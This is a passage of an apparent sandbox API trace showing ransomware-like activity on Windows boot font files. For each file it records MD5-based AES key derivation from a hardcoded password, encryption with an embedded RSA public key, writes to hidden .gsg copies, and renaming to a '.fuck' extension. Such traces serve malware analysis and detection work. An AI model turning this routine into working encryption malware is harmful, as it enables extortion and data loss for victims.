(lpExistingFileName="C:\\\\Boot\\Fonts\\chs_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\chs_boot.ttf.gsg"), lpNewFileName="C:\\\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), bFailIfExists=0) returned 0 [0126.894] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\chs_boot.ttf", dwFileAttributes=0x0) returned 0 [0126.894] DeleteFileA (lpFileName="C:\\\\Boot\\Fonts\\chs_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\chs_boot.ttf.gsg")) returned 1 [0126.896] MoveFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), lpNewFileName="C:\\\\Boot\\Fonts\\chs_boot.ttf.fuck" (normalized: "c:\\boot\\fonts\\chs_boot.ttf.fuck")) returned 0 [0126.896] CryptDestroyHash (hHash=0x69d368) returned 1 [0126.896] CryptDestroyKey (hKey=0x69d6e8) returned 1 [0126.896] CryptReleaseContext (hProv=0x27eca20, dwFlags=0x0) returned 1 [0126.896] FindNextFileA (in: hFindFile=0x69d328, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0126.896] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0126.896] GetLastError () returned 0x5 [0126.896] GetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf")) returned 0x20 [0126.896] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\cht_boot.ttf", dwFileAttributes=0x80) returned 0 [0126.897] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0126.897] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\cht_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\cht_boot.ttf.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cd8 [0126.897] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\cht_boot.ttf.gsg", dwFileAttributes=0x2) returned 1 [0126.898] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x27ecd50) returned 1 [0126.900] CryptCreateHash (in: hProv=0x27ecd50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0126.900] lstrlenA (lpString="miyiMmnMTcbAzXSmrboOmHkozMlQm") returned 29 [0126.900] CryptHashData (hHash=0x69d428, pbData=0x5bd010, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0126.900] CryptDeriveKey (in: hProv=0x27ecd50, Algid=0x6610, hBaseData=0x69d428, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x69d6e8) returned 1 [0126.900] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0126.900] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0126.900] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x27ed108) returned 1 [0126.901] CryptImportPublicKeyInfo (in: hCryptProv=0x27ed108, dwCertEncodingType=0x1, pInfo=0x27db7c8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27db7f8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27db800*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x69e128) returned 1 [0126.901] CryptEncrypt (in: hKey=0x69e128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0126.901] CryptEncrypt (in: hKey=0x69e128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27ecdd8*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x27ecdd8*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0126.901] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27ecdd8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27ecdd8*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0126.902] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27f0a60, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27f0a60, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0126.902] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27f0a60*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x27f0a60*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0126.902] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27f0a60*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27f0a60*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0126.902] CloseHandle (hObject=0xffffffff) returned 1 [0126.902] CloseHandle (hObject=0x5cd8) returned 1 [0126.903] CopyFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\cht_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\cht_boot.ttf.gsg"), lpNewFileName="C:\\\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), bFailIfExists=0) returned 0 [0126.922] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\cht_boot.ttf", dwFileAttributes=0x0) returned 0 [0126.923] DeleteFileA (lpFileName="C:\\\\Boot\\Fonts\\cht_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\cht_boot.ttf.gsg")) returned 1 [0126.924] MoveFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), lpNewFileName="C:\\\\Boot\\Fonts\\cht_boot.ttf.fuck" (normalized: "c:\\boot\\fonts\\cht_boot.ttf.fuck")) returned 0 [0126.924] CryptDestroyHash (hHash=0x69d428) returned 1 [0126.924] CryptDestroyKey (hKey=0x69d6e8) returned 1 [0126.924] CryptReleaseContext (hProv=0x27ecd50, dwFlags=0x0) returned 1 [0126.924] FindNextFileA (in: hFindFile=0x69d328, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0126.924] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0126.925] GetLastError () returned 0x5 [0126.925] GetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf")) returned 0x20 [0126.925] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\jpn_boot.ttf", dwFileAttributes=0x80) returned 0 [0126.926] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0126.926] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\jpn_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cd8 [0126.926] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\jpn_boot.ttf.gsg", dwFileAttributes=0x2) returned 1 [0126.927] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x27ec800) returned 1 [0126.929] CryptCreateHash (in: hProv=0x27ec800, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0126.929] lstrlenA (lpString="miyiMmnMTcbAzXSmrboOmHkozMlQm") returned 29 [0126.929] CryptHashData (hHash=0x69d6e8, pbData=0x5bcd68, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0126.929] CryptDeriveKey (in: hProv=0x27ec800, Algid=0x6610, hBaseData=0x69d6e8, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x69d368) returned 1 [0126.929] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0126.929] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0126.929] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x27ecb30) returned 1 [0126.930] CryptImportPublicKeyInfo (in: hCryptProv=0x27ecb30, dwCertEncodingType=0x1, pInfo=0x27da518*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27da548*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27da550*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x69dfa8) returned 1 [0126.930] CryptEncrypt (in: hKey=0x69dfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0126.930] CryptEncrypt (in: hKey=0x69dfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27eca20*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x27eca20*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0126.930] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27eca20*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27eca20*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0126.931] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27f2a68, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27f2a68, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0126.931] CryptEncrypt (in: hKey=0x69d368, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27f2a68*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x27f2a68*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0126.931] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27f2a68*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27f2a68*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0126.931] CloseHandle (hObject=0xffffffff) returned 1 [0126.931] CloseHandle (hObject=0x5cd8) returned 1 [0126.932] CopyFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\jpn_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf.gsg"), lpNewFileName="C:\\\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), bFailIfExists=0) returned 0 [0126.936] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\jpn_boot.ttf", dwFileAttributes=0x0) returned 0 [0126.936] DeleteFileA (lpFileName="C:\\\\Boot\\Fonts\\jpn_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf.gsg")) returned 1 [0126.939] MoveFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), lpNewFileName="C:\\\\Boot\\Fonts\\jpn_boot.ttf.fuck" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf.fuck")) returned 0 [0126.939] CryptDestroyHash (hHash=0x69d6e8) returned 1 [0126.939] CryptDestroyKey (hKey=0x69d368) returned 1 [0126.939] CryptReleaseContext (hProv=0x27ec800, dwFlags=0x0) returned 1 [0126.939] FindNextFileA (in: hFindFile=0x69d328, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0126.939] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0126.939] GetLastError () returned 0x5 [0126.939] GetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf")) returned 0x20 [0126.939] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\kor_boot.ttf", dwFileAttributes=0x80) returned 0 [0126.939] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0126.940] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\kor_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cd8 [0126.940] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\kor_boot.ttf.gsg", dwFileAttributes=0x2) returned 1 [0126.940] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x27ecc40) returned 1 [0126.942] CryptCreateHash (in: hProv=0x27ecc40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0126.942] lstrlenA (lpString="miyiMmnMTcbAzXSmrboOmHkozMlQm") returned 29 [0126.942] CryptHashData (hHash=0x69d6e8, pbData=0x5bcd68, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0126.942] CryptDeriveKey (in: hProv=0x27ecc40, Algid=0x6610, hBaseData=0x69d6e8, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x69d428) returned 1 [0126.942] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0126.942] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0126.942] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x27ec800) returned 1 [0126.942] CryptImportPublicKeyInfo (in: hCryptProv=0x27ec800, dwCertEncodingType=0x1, pInfo=0x27db148*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27db178*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27db180*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x69dae8) returned 1 [0126.943] CryptEncrypt (in: hKey=0x69dae8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0126.943] CryptEncrypt (in: hKey=0x69dae8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27ec910*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x27ec910*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0126.943] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27ec910*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27ec910*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0126.943] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27f2a68, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27f2a68, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0126.943] CryptEncrypt (in: hKey=0x69d428, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27f2a68*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x27f2a68*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0126.944] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27f2a68*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27f2a68*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0126.944] CloseHandle (hObject=0xffffffff) returned 1 [0126.944] CloseHandle (hObject=0x5cd8) returned 1 [0126.944] CopyFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\kor_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.gsg"), lpNewFileName="C:\\\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), bFailIfExists=0) returned 0 [0126.947] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\kor_boot.ttf", dwFileAttributes=0x0) returned 0 [0126.948] DeleteFileA (lpFileName="C:\\\\Boot\\Fonts\\kor_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.gsg")) returned 1 [0126.948] MoveFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), lpNewFileName="C:\\\\Boot\\Fonts\\kor_boot.ttf.fuck" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.fuck")) returned 0 [0126.949] CryptDestroyHash (hHash=0x69d6e8) returned 1 [0126.949] CryptDestroyKey (hKey=0x69d428) returned 1 [0126.949] CryptReleaseContext (hProv=0x27ecc40, dwFlags=0x0) returned 1 [0126.949] FindNextFileA (in: hFindFile=0x69d328, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0126.949] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0126.949] GetLastError () returned 0x5 [0126.949] GetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\malgunn_boot.ttf" (normalized: "c:\\boot\\fonts\\malgunn_boot.ttf")) returned 0x20 [0126.950] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\malgunn_boot.ttf", dwFileAttributes=0x80) returned 0 [0126.950] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\malgunn_boot.ttf" (normalized: "c:\\boot\\fonts\\malgunn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0126.950] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\malgunn_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\malgunn_boot.ttf.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cd8 [0126.951] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\malgunn_boot.ttf.gsg", dwFileAttributes=0x2) returned 1 [0126.951] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x27ecff8) returned 1 [0126.953] CryptCreateHash (in: hProv=0x27ecff8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0126.953] lstrlenA (lpString="miyiMmnMTcbAzXSmrboOmHkozMlQm") returned 29 [0126.953] CryptHashData (hHash=0x69d368, pbData=0x5bd010, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0126.953] CryptDeriveKey (in: hProv=0x27ecff8, Algid=0x6610, hBaseData=0x69d368, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x69d428) returned 1 [0126.953] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0126.953] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0126.953] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x27ed6e0) returned 1 [0126.954] CryptImportPublicKeyInfo (in: hCryptProv=0x27ed6e0, dwCertEncodingType=0x1, pInfo=0x27db6f8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27db728*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27db730*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x69de28) returned 1 [0126.954] CryptEncrypt (in: hKey=0x69de28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0126.954] CryptEncrypt (in: hKey=0x69de28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27ed2a0*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x27ed2a0*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0126.954] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27ed2a0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27ed2a0*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0126.955] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27f2a68, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27f2a68, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0126.955] CryptEncrypt (in: hKey=0x69d428, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27f2a68*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x27f2a68*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0126.955] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27f2a68*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27f2a68*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0126.955] CloseHandle (hObject=0xffffffff) returned 1 [0126.955] CloseHandle (hObject=0x5cd8) returned 1 [0126.956] CopyFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\malgunn_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\malgunn_boot.ttf.gsg"), lpNewFileName="C:\\\\Boot\\Fonts\\malgunn_boot.ttf" (normalized: "c:\\boot\\fonts\\malgunn_boot.ttf"), bFailIfExists=0) returned 0 [0126.959] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\malgunn_boot.ttf", dwFileAttributes=0x0) returned 0 [0126.959] DeleteFileA (lpFileName="C:\\\\Boot\\Fonts\\malgunn_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\malgunn_boot.ttf.gsg")) returned 1 [0126.960] MoveFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\malgunn_boot.ttf" (normalized: "c:\\boot\\fonts\\malgunn_boot.ttf"), lpNewFileName="C:\\\\Boot\\Fonts\\malgunn_boot.ttf.fuck" (normalized: "c:\\boot\\fonts\\malgunn_boot.ttf.fuck")) returned 0 [0126.960] CryptDestroyHash (hHash=0x69d368) returned 1 [0126.960] CryptDestroyKey (hKey=0x69d428) returned 1 [0126.960] CryptReleaseContext (hProv=0x27ecff8, dwFlags=0x0) returned 1 [0126.960] FindNextFileA (in: hFindFile=0x69d328, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0126.960] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | 